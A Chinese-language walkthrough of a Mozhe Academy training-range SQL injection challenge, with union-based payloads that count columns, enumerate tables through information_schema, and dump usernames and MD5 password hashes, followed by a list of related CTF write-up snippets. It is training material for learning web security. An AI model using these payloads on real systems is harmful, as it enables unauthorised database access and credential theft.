墨者学院PHP,墨者学院SQL注入解题
一·判断注入
输入id=1,正常返回。输入id=-1返回错误。由 此可知存在注入。
二·判断字段
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 此时报错,说明有四个字段
三·使用union查询注入点
输入union select 1,2,3,4
发现2,3为显注点
四·使用database()查库名
输入 union select 1,database(),3,4
查出库名为 mozhe_Discuz_StormGroup
五·查表名
输入
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
查询到StormGroup_member,notice
看见member,所以对第一个产生怀疑。所以首先查询第一个。
六·查询StormGroup_member中的存放的字段
输入
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
查询出id,name,password,status
七·查询密码和用户名
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
得到md5加密后的值。进行解密,得到密码。
如果密码不对,通过limit m,n来继续查询。
八·提交key
得到密码后进行登录可以看见key,复制,提交。
墨者学院PHP,墨者学院SQL注入解题相关推荐
- 超详细,手把手教你一次简单的SQL注入,不用任何工具,带你走进web安全的大门
超详细,手把手教你一次简单的SQL注入,不用任何工具,带你走进web安全的大门 靶场网站,网站所有权在二向箔安全学院 知识盒子 简单的SQL注入题目,可以用来入门练习,体验一下实训 老套的题目:提取网 ...
- 强网杯 2019]随便注 【SQL注入】四种解法
题目简介 题目名称:[强网杯 2019]随便注 1 题目平台:BUUCTF 题目类型:Web 考察知识点: SQL注入 解题步骤 方法一: 首先启动并访问靶机,有一个输入框,随便输入1' or 1 = ...
- 墨者学院-SQL注入漏洞测试(报错盲注)
继续攻克SQL注入类题目啦!!!今天的题目环境提示比较明显,也是比较常见的一种SQL注入漏洞类型,继续储备知识,撸起袖子加油干!!! 附上题目链接:https://www.mozhe.cn/bug/d ...
- 墨者学院-SQL注入漏洞测试(布尔盲注)
决心按部就班.由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路.本题靶场环境比较简单.也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目.废话 ...
- 渣渣白学习渗透之路(墨者学院sql注入之旅)
渣渣白学习渗透之路 说明:1. 未经授权的渗透测试都是违法的! 2. 文章用红色字体编写的部分是关键部分(认真看)!!! 3. 文章用黑色字体编写的部分是渣渣白内心独白,无关紧0! 4. 文章 ...
- 墨者学院 靶场练习(一) SQL注入
墨者学院 在线靶场 工具: sqlmap 第一题: SQL手工注入漏洞测试(MySQL数据库-字符型) 利用工具 可以很快速注入,手工注入请看 https://blog.csdn.net/qq_423 ...
- sql注入(2) 墨者学院之SQL手工注入漏洞测试(MySQL数据库-字符型)
目录 1.工具及靶场环境 2.解题步骤 2.1判断注入点 2.2判断字段数 2.3信息收集 2.4爆破数据库 2.4.1爆破数据库表名 2.4.2爆破指定表的列名 2.4.3查询账号密码 3.md5解 ...
- 某学院系统sql注入到服务器沦陷(bypss)
前言 前一段时间都在挖edu src,为了混几个证书,中间陆陆续续也挖到好几枚系统的通杀吧,不过资产都不多,都是黑盒测试出来的,没啥技术含量.只有这次挖到的这枚通杀稍微有那么一点点价值,从外网web一 ...
- 湘潭大学网络编程_湘潭大学计算机学院网络空间安全学院“湘韵”研究生论坛成功举行...
聚计网湘韵,享学术盛宴 聚计网湘韵,享学术盛宴.2020年11月26日下午,由湘潭大学计算机学院·网络空间安全学院举办的研究生湘韵论坛在工科楼阶梯教室举行,全体研究生新生参加,肖芬副院长致开幕辞. & ...
最新文章
- 动态规划4--最佳加法表达式
- 用xlg.tel来管理自己
- python3 中print 显示不全问题
- 市面上主流的TCC框架介绍
- 怎样进入android模式,安卓手机如何进入Recovery模式的通用方式详解
- linux安全服务管理,Linux系统安全管理服务配置方法与技巧
- Things That Cannot Change
- Vue前后端对接时判断是否与后端连接成功
- 开始投靠C#,入门版(一)
- 4.3 createjs
- 【最新】Oracle官网Java SE各个版本JDK下载位置
- 关键词组合工具-自动关键词挖掘组成关键词软件免费
- 人工智能十大算法_套磁amp;科研 |南加利福尼亚大学空间科学研究所终身教授YaoYi Chiang带来数据挖掘算法研究课题...
- 【软技能】完全写作指南--简历
- 如何制作DUN-14条形码
- 【python】rank函数
- 这是浙江大学郑强教授的经典语录 虽然我不完全赞同但对他的精神佩服的五体投地...
- c# 使用Office com组件时遇到的问题
- 王某与石某的分歧卡卡罗特
- python中http协议编程_python网络编程、套接字、HTTP协议